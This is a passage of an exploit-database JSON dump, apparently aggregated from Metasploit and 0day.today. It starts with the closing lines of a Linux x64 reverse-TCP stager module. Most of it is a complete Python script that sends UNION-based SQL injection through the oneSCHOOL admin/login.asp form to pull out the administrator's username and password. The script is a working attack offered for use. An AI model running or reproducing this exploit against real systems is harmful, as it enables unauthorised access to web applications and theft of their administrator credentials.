'Platform' => 'linux',\n 'Arch' => ARCH_X64,\n 'Handler' => Msf::Handler::ReverseTcp,\n 'Stager' => { 'Payload' => '' }))\n end\n\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/payloads/stagers/linux/x64/reverse_tcp.rb"}], "zdt": [{"lastseen": "2018-01-10T07:02:25", "bulletinFamily": "exploit", "description": "Exploit for unknown platform in category web applications", "modified": "2007-12-31T00:00:00", "published": "2007-12-31T00:00:00", "id": "1337DAY-ID-2432", "href": "https://0day.today/exploit/description/2432", "type": "zdt", "title": "oneSCHOOL (all versions) admin/login.asp SQL Injection exploit", "sourceData": "==============================================================\r\noneSCHOOL (all versions) admin/login.asp SQL Injection exploit \r\n==============================================================\r\n\r\n\r\n\r\n#!/usr/bin/python\r\n\r\n#oneSCHOOL admin/login.asp SQL Injection explot (for all versions)\r\n#by Guga360.\r\n\r\nimport urllib\r\nfrom sys import argv\r\n\r\nquery = {'txtOperation':'Login','txtLoginID':\"\"\"\r\n' union select min(LoginName),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from UsersSecure where LoginName>'a'--\"\"\",'txtPassword':'x','btnSubmit':'L+O+G+I+N+%3E%3E'}\r\n\r\nqueryx = urllib.urlencode(query)\r\n\r\nif len(argv)<>2:\r\n print \"\"\"\r\n **********\r\n \r\n Usage:\r\n oneSCHOOLxpl.py [host]\r\n\r\n [+] Exploiting...\r\n \r\n [+] User: admin\r\n [+] Password: 123\r\n \r\n *******************\r\n \"\"\"\r\nelse:\r\n try:\r\n print '\\n[+] Exploting...\\n'\r\n host = argv[1] \r\n if host[0:7]<>'http://':\r\n host = 'http://'+host\r\n url = urllib.urlopen(host+'/admin/login.asp', queryx)\r\n url = url.read()\r\n url = url.split()\r\n name = url.index('varchar')+2\r\n name = url[name]\r\n name = name.replace(\"'\",\"\")\r\n print '[+] User: ' + name\r\n query2 = query.copy()\r\n query2['txtLoginID']=\"\"\"' union select min(Password),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from UsersSecure where LoginName='\"\"\"+name+\"\"\"'--\"\"\"\r\n query2 = urllib.urlencode(query2)\r\n url = urllib.urlopen(host+'/admin/login.asp', query2)\r\n url = url.read()\r\n url = url.split()\r\n passw = url.index('varchar')+2\r\n passw = url[passw]\r\n passw = passw.replace(\"'\",\"\")\r\n print '[+] Pass: '+passw\r\n except:\r\n print '[+] Not vulnerable!'\r\n\r\n\r\n\n# 0day.today [2018-01-10] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/2432"}]}
